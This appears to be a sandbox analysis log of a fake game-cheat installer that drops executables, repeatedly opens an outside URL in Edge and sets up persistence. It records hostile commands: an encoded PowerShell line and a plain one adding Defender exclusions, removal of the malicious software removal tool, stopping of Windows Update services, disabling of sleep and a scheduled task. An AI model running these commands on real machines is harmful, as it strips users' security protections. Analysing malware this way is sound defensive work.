        PID:5660
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6736 /prefetch:1
        5⤵
        
        PID:5584
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:1
        5⤵
        
        PID:1676
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:1
        5⤵
        
        PID:5860
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6676 /prefetch:1
        5⤵
        
        PID:5836
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7032 /prefetch:1
        5⤵
        
        PID:5656
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
        5⤵
        
        PID:2872
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
        5⤵
        
        PID:6200
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1
        5⤵
        
        PID:4012
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5964 /prefetch:8
        5⤵
        
        PID:4604
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2448 /prefetch:2
        5⤵
        
        PID:7136
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://onepiecered.co/s?mH4q
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of SendNotifyMessage
      PID:5900
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd761246f8,0x7ffd76124708,0x7ffd76124718
        5⤵
        
        PID:6380
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,9005804277348147245,2677752853862165900,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
        5⤵
        
        PID:2016
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,9005804277348147245,2677752853862165900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
        5⤵
        
        PID:6468
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,9005804277348147245,2677752853862165900,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
        5⤵
        
        PID:4072
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9005804277348147245,2677752853862165900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
        5⤵
        
        PID:4948
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9005804277348147245,2677752853862165900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
        5⤵
        
        PID:6932
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9005804277348147245,2677752853862165900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
        5⤵
        
        PID:6028
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9005804277348147245,2677752853862165900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
        5⤵
        
        PID:7412
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9005804277348147245,2677752853862165900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
        5⤵
        
        PID:6596
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9005804277348147245,2677752853862165900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1
        5⤵
        
        PID:7740
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://onepiecered.co/s?mH4q
      4⤵
      PID:6116
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd761246f8,0x7ffd76124708,0x7ffd76124718
        5⤵
        
        PID:5936
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://onepiecered.co/s?mH4q
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:6440
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffd761246f8,0x7ffd76124708,0x7ffd76124718
        5⤵
        
        PID:2712
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,7535054854053532693,14457134243979751957,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        5⤵
        
        PID:5388
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,7535054854053532693,14457134243979751957,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
        5⤵
        
        PID:6060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,7535054854053532693,14457134243979751957,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
        5⤵
        
        PID:6040
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7535054854053532693,14457134243979751957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
        5⤵
        
        PID:7072
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7535054854053532693,14457134243979751957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
        5⤵
        
        PID:7556
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7535054854053532693,14457134243979751957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
        5⤵
        
        PID:7092
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7535054854053532693,14457134243979751957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3856 /prefetch:1
        5⤵
        
        PID:1252
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,7535054854053532693,14457134243979751957,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3456 /prefetch:8
        5⤵
        
        PID:8064
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,7535054854053532693,14457134243979751957,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3456 /prefetch:8
        5⤵
        
        PID:8052
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7535054854053532693,14457134243979751957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
        5⤵
        
        PID:7808
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7535054854053532693,14457134243979751957,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
        5⤵
        
        PID:3728
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7535054854053532693,14457134243979751957,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1
        5⤵
        
        PID:7484
- C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe
  "C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3524

C:\Users\Admin\Downloads\ValosploitV3_Installer\ValosploitV3_Installer\Installer.exe
"C:\Users\Admin\Downloads\ValosploitV3_Installer\ValosploitV3_Installer\Installer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4808
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AbQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcABpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAbgBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAcQB2ACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:6488
- C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe
  "C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:396
- C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe
  "C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"
  2⤵
  - Executes dropped EXE
  PID:952
- C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe
  "C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7372
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD459.tmp" /F
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:7844
- C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe
  "C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:7260
- - C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe
    "C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:6576
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://onepiecered.co/s?mH4q
      4⤵
      PID:5264
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffd761246f8,0x7ffd76124708,0x7ffd76124718
        5⤵
        
        PID:6264
- C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe
  "C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:7588

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5764

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5864

C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe
C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5424
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:5320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:6928
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:7408
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:7016
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:7516
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:7872
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:5248
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:7924
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:8000
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:7988
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:8100
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:8136
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:8156
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1504

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4cc 0x344
1⤵
PID:6648

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4784

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5508

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5636

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:572

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4356

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd67f2cc40,0x7ffd67f2cc4c,0x7ffd67f2cc58
  2⤵
  PID:5336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1848,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1812 /prefetch:2
  2⤵
  PID:7220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2176,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2188 /prefetch:3
  2⤵
  PID:6860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2260 /prefetch:8
  2⤵
  PID:7268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3096 /prefetch:1
  2⤵
  PID:5732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3228 /prefetch:1
  2⤵
  PID:5644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4432,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4340 /prefetch:1
  2⤵
  PID:4112
- C:\Program Files\Google\Chrome\Application\chrome.exe
